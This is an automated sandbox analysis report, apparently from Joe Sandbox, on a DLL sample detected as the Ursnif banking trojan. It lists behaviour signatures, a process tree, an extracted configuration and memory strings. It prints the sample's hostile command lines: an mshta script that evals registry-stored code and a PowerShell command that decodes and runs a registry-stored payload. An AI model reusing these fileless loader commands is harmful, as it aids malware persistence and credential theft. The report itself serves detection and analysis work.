Loading ...

Play interactive tourEdit tour

Analysis Report 960

Overview

General Information

Sample Name:960 (renamed file extension from none to dll)
Analysis ID:318723
MD5:e1dca134544906777f356b7d05218cc6
SHA1:5cba3c12fca72028c59976783fd2491aa81027b7
SHA256:907ef06dae099405a2d6368af5306ccd1a40fea4b760a732289427edf19d12c3
Tags:BRT

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6124 cmdline: loaddll32.exe 'C:\Users\user\Desktop\960.dll' MD5: 62442CB29236B024E992A556DA72B97A)
    • regsvr32.exe (PID: 5540 cmdline: regsvr32.exe /s C:\Users\user\Desktop\960.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 5568 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 4424 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 7004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 720 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 5536 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 4152 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 5948 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4152 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 5896 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4152 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6948 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4152 CREDAT:82966 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 7064 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4152 CREDAT:82970 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 7156 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4152 CREDAT:82974 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5644 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4508 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4760 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\d0du53au\d0du53au.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6484 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESEADC.tmp' 'c:\Users\user\AppData\Local\Temp\d0du53au\CSCF905C4AC21E849418EF811A0FD7A661D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 1288 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\232c021r\232c021r.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5996 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES162.tmp' 'c:\Users\user\AppData\Local\Temp\232c021r\CSCFD9A7DE06A1D414591643B72245586A6.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 3332 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\273F.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "version": "250162", "uptime": "144hh", "crc": "2", "id": "4343", "user": "0291816208f8d2d8cdc8873a3ba1a8e3", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.387108602.00000000001E0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.387108602.00000000001E0000.00000004.00000001.sdmpGoziRuleWin32.GoziCCN-CERT
    • 0x880:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
    0000001C.00000003.396726883.0000021402DE0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.260223399.0000000004B78000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000024.00000002.563062577.0000024340AA5000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          Click to see the 19 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\d0du53au\d0du53au.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\d0du53au\d0du53au.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4508, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\d0du53au\d0du53au.cmdline', ProcessId: 4760
          Sigma detected: MSHTA Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5644, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ProcessId: 4508
          Sigma detected: Suspicious Csc.exe Source File FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\d0du53au\d0du53au.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\d0du53au\d0du53au.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4508, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\d0du53au\d0du53au.cmdline', ProcessId: 4760
          Sigma detected: Suspicious Rundll32 ActivityShow sources
          Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5568, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 4424

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: regsvr32.exe.5540.1.memstrMalware Configuration Extractor: Ursnif {"server": "12", "version": "250162", "uptime": "144hh", "crc": "2", "id": "4343", "user": "0291816208f8d2d8cdc8873a3ba1a8e3", "soft": "3"}
          Source: regsvr32.exe.5540.1.memstrMalware Configuration Extractor: Ursnif {"server": "12", "version": "250162", "uptime": "144hh", "crc": "2", "id": "4343", "user": "0291816208f8d2d8cdc8873a3ba1a8e3", "soft": "3"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 960.dllVirustotal: Detection: 12%Perma Link
          Source: 960.dllVirustotal: Detection: 12%Perma Link
          Machine Learning detection for sampleShow sources
          Source: 960.dllJoe Sandbox ML: detected
          Source: 960.dllJoe Sandbox ML: detected

          Networking:

          barindex
          Creates a COM Internet Explorer objectShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
          Found Tor onion addressShow sources
          Source: regsvr32.exe, 00000001.00000003.387108602.00000000001E0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
          Source: powershell.exe, 00000016.00000003.394850180.000001C26BD90000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
          Source: control.exe, 0000001C.00000003.396726883.0000021402DE0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
          Source: explorer.exe, 0000001D.00000000.425256395.0000000005BC5000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
          Source: RuntimeBroker.exe, 0000001E.00000002.565453842.0000026754D05000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
          Source: rundll32.exe, 00000020.00000003.411051595.000001FFA0E40000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
          Source: regsvr32.exe, 00000001.00000003.387108602.00000000001E0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
          Source: powershell.exe, 00000016.00000003.394850180.000001C26BD90000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
          Source: control.exe, 0000001C.00000003.396726883.0000021402DE0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
          Source: explorer.exe, 0000001D.00000000.425256395.0000000005BC5000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
          Source: RuntimeBroker.exe, 0000001E.00000002.565453842.0000026754D05000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
          Source: rundll32.exe, 00000020.00000003.411051595.000001FFA0E40000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
          Source: Joe Sandbox ViewIP Address: 172.217.168.42 172.217.168.42
          Source: Joe Sandbox ViewIP Address: 172.217.168.42 172.217.168.42
          Source: Joe Sandbox ViewIP Address: 216.58.206.36 216.58.206.36
          Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
          Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
